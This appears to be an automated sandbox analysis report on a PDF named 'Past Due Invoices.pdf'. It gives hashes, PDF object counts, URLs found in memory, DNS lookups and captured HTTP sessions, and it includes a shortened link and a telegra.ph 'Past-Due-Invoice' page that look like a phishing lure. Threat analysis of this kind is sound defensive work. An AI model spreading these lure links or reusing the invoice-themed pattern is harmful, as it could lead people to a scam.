Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: Ruleset Data.26.dr	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.26.dr, Ruleset Data.26.dr	String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.26.dr	String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)

Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cipa.jp/exif/1.0/
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cipa.jp/exif/1.0/1.0/4
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/k
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/field#
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/8
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/?
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/property#
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/schema#P
Source: AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/type#
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aiim.org/pdfe/ns/id/
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.npes.org/pdfx/ns/id/
Source: AcroRd32.exe, 00000001.00000000.538137621.000000000B367000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.quicktime.com.Acrobat
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/#8:m
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/883m
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/l:
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/g7
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/k8
Source: AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/r9
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://accounts.google.com
Source: craw_window.js.26.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr	String found in binary or memory: https://ajax.googleapis.com
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.echosign.com
Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.echosign.comameArraF~
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://apis.google.com
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json.26.dr, manifest.json1.26.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr	String found in binary or memory: https://content-autofill.googleapis.com
Source: LICENSE.txt.26.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.26.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: b5404c6c-4576-4a9f-a871-af26967eb4e2.tmp.27.dr, 219afb8a-eb1f-4550-9f5b-ca9c25c9cc68.tmp.27.dr, e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://dns.google
Source: LICENSE.txt.26.dr	String found in binary or memory: https://easylist.to/)
Source: d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://fonts.googleapis.com
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.26.dr	String found in binary or memory: https://github.com/easylist)
Source: craw_background.js.26.dr, craw_window.js.26.dr	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: AcroRd32.exe, 00000001.00000000.487309761.0000000008E26000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ims-na1.adobelogin.com
Source: AcroRd32.exe, 00000001.00000000.535754924.000000000AD32000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://lnkd.in/dptWHpAa
Source: AcroRd32.exe, 00000001.00000000.532130124.0000000008FA4000.00000004.00000001.00020000.00000000.sdmp, Past Due Invoices.pdf	String found in binary or memory: https://lnkd.in/dptWHpAa)
Source: History Provider Cache.26.dr	String found in binary or memory: https://lnkd.in/dptWHpAa2
Source: AcroRd32.exe, 00000001.00000000.535754924.000000000AD32000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://lnkd.in/dptWHpAay
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://ogs.google.com
Source: craw_window.js.26.dr, manifest.json1.26.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr	String found in binary or memory: https://r3---sn-5hne6nzk.gvt1.com
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr	String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.26.dr, manifest.json1.26.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://ssl.gstatic.com
Source: History Provider Cache.26.dr	String found in binary or memory: https://telegra.ph/Past-Due-Invoice-05-132
Source: craw_background.js.26.dr, craw_window.js.26.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://www.google.com
Source: manifest.json1.26.dr	String found in binary or memory: https://www.google.com/
Source: craw_window.js.26.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.26.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.26.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.26.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.26.dr	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_background.js.26.dr, craw_window.js.26.dr, e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json1.26.dr	String found in binary or memory: https://www.googleapis.com/
Source: manifest.json1.26.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json1.26.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json1.26.dr	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json1.26.dr	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	String found in binary or memory: https://www.gstatic.com

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.62567835437736
Encrypted:	false
SSDEEP:	3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVp//lmhdhMktC9lll//iTFJrqzOJkvPo:men9YOFLvEWdM9Qw/lmPt+/Ji7Z+P41
MD5:	6CB884175CACC94094C9E4DE93EBD0FD
SHA1:	7A9B0F04245B06C0131424BFFD768B24ECB01285
SHA-256:	54D6BA6BBE75F43C8002434D476A496CF7653EE029E7DC9E96D11FC8D3B3E21E
SHA-512:	518FE4346057028C4CD7E038F96F13C8D61169525FE2D60D99F05F4F1FCD41D469304BB64A1E1E6F77012DBE3114988F9D00B03D1EC7D637A7F9A99B21E964E7
Malicious:	false
Preview:	0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ...D.=/....."#.D..Ox..A.A..Eo.......Gf.............d.{v.^.G...d.W.:...P..k%..A..Eo..................

File type:	PDF document, version 1.5
Entropy (8bit):	7.98786993931996
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	Past Due Invoices.pdf
File size:	164459
MD5:	fedf390692465b96a151685cc467ae62
SHA1:	d983b3484bab16f4d2b2318066e009d0126050e1
SHA256:	abbe28038526ba0fe28b0f39d224acaa67fb003adda280932939596c72833936
SHA512:	8e8bbf1fc708f570f75db4b7905c507b7005c3899812fa75457cb8c8d36b9f119c7aa5b7806482a285b764f26b4d0ffb79445b2eac3f2f3354a298a7b74261ba
SSDEEP:	3072:6xkSZU9n3o8eeocly6uNq3YVojkrvm1OY15n/Tn/pwepxJumKW:6x5ZC3oGyjQYQkrvcb/Tnh9pxJ5l
TLSH:	29F30295A52EE93DDE584133F50C9A884737BB39BBE4925B80FC12C8D10EF2D5A214D7
File Content Preview:	%PDF-1.5.%.....8 0 obj.<<./Filter /FlateDecode./Length 142543./Length1 335300.>>.stream.x..}.XTG.v.....nh......QAQq..V...YZ.EA..."h....D....}3.Y...&bV.q..1.$...df2..=..F....K.I.\|.&.........N-...[u.y.0..K.......O.ys.......+.ZP....\.mk.......o1.{.q.u.)oM+(,

General
Header:	%PDF-1.5
Total Entropy:	7.987870
Total Bytes:	164459
Stream Entropy:	7.989590
Stream Bytes:	160477
Entropy outside Streams:	0.000000
Bytes outside Streams:	3982
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	26
endobj	26
stream	3
endstream	3
xref	1
trailer	1
startxref	1
/Page	1
/Encrypt	0
/ObjStm	0
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 13, 2022 20:46:28.806106091 CEST	49520	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:28.827179909 CEST	53	49520	8.8.8.8	192.168.2.6
May 13, 2022 20:46:43.166058064 CEST	58801	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:43.173633099 CEST	59028	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:43.192193985 CEST	61571	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:43.194654942 CEST	53	59028	8.8.8.8	192.168.2.6
May 13, 2022 20:46:43.206382990 CEST	53	58801	8.8.8.8	192.168.2.6
May 13, 2022 20:46:43.211400032 CEST	53	61571	8.8.8.8	192.168.2.6
May 13, 2022 20:46:43.680187941 CEST	49754	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:43.698890924 CEST	53	49754	8.8.8.8	192.168.2.6
May 13, 2022 20:46:44.101772070 CEST	64150	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:44.120609045 CEST	53	64150	8.8.8.8	192.168.2.6
May 13, 2022 20:46:44.938965082 CEST	57669	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:44.967106104 CEST	53	57669	8.8.8.8	192.168.2.6
May 13, 2022 20:46:45.948156118 CEST	64289	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:45.967016935 CEST	53	64289	8.8.8.8	192.168.2.6
May 13, 2022 20:46:49.219752073 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.245620966 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.246157885 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.272006989 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.272073984 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.272124052 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.272146940 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.272625923 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.274266005 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.337606907 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.344244003 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.370721102 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.380002022 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.380048990 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.380064964 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.396912098 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.453315973 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.565483093 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.790612936 CEST	443	58565	142.250.185.238	192.168.2.6
May 13, 2022 20:46:49.837176085 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.837735891 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.837850094 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.837932110 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:49.941947937 CEST	58565	443	192.168.2.6	142.250.185.238
May 13, 2022 20:46:53.621942997 CEST	50453	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:53.641455889 CEST	53	50453	8.8.8.8	192.168.2.6
May 13, 2022 20:46:54.351380110 CEST	55745	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:54.354353905 CEST	64375	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:54.356513977 CEST	63844	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:54.373785973 CEST	53	55745	8.8.8.8	192.168.2.6
May 13, 2022 20:46:54.386557102 CEST	51645	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:54.392817974 CEST	65010	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:54.394896984 CEST	49287	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:54.415445089 CEST	53	65010	8.8.8.8	192.168.2.6
May 13, 2022 20:46:54.417036057 CEST	53	49287	8.8.8.8	192.168.2.6
May 13, 2022 20:46:54.510963917 CEST	53	63844	8.8.8.8	192.168.2.6
May 13, 2022 20:46:57.840689898 CEST	50520	53	192.168.2.6	8.8.8.8
May 13, 2022 20:46:58.219372988 CEST	53	50520	8.8.8.8	192.168.2.6

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:43 UTC	0	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:43 UTC	0	OUT	Data Raw: 20 Data Ascii:
2022-05-13 18:46:43 UTC	3	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 13 May 2022 18:46:43 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-o5-dp6Y7AcX-Dty1OYkWBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'nonce-o5-dp6Y7AcX-Dty1OYkWBg' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2022-05-13 18:46:43 UTC	5	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2022-05-13 18:46:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:43 UTC	0	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm X-Goog-Update-Updater: chromecrx-85.0.4183.121 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:43 UTC	2	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-ggWMjUVVEFkxw79pWNrO3w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 13 May 2022 18:46:43 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5611 X-Daystart: 42403 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2022-05-13 18:46:43 UTC	3	IN	Data Raw: 33 36 64 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 36 31 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 32 34 30 33 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 36d<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5611" elapsed_seconds="42403"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2022-05-13 18:46:43 UTC	3	IN	Data Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><a
2022-05-13 18:46:43 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:44 UTC	21	OUT	GET /_websync_?path=Past-Due-Invoice-05-13&hash=1c67ee9ce8dc79971f HTTP/1.1 Host: t.me Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://telegra.ph/Past-Due-Invoice-05-13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:44 UTC	92	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 13 May 2022 18:46:44 GMT Content-Type: text/javascript Content-Length: 5 Connection: close Pragma: no-cache Cache-control: no-store Strict-Transport-Security: max-age=35768000
2022-05-13 18:46:44 UTC	92	IN	Data Raw: 2f 2f 20 6f 6b Data Ascii: // ok

Timestamp	kBytes transferred	Direction	Data
2022-05-13 18:46:44 UTC	346	OUT	GET /js/quill.min.js?9 HTTP/1.1 Host: telegra.ph Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://telegra.ph/Past-Due-Invoice-05-13 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-05-13 18:46:44 UTC	367	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 13 May 2022 18:46:44 GMT Content-Type: application/javascript Content-Length: 201847 Last-Modified: Thu, 26 Oct 2017 12:06:45 GMT Connection: close ETag: "59f1cfd5-31477" Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Accept-Ranges: bytes
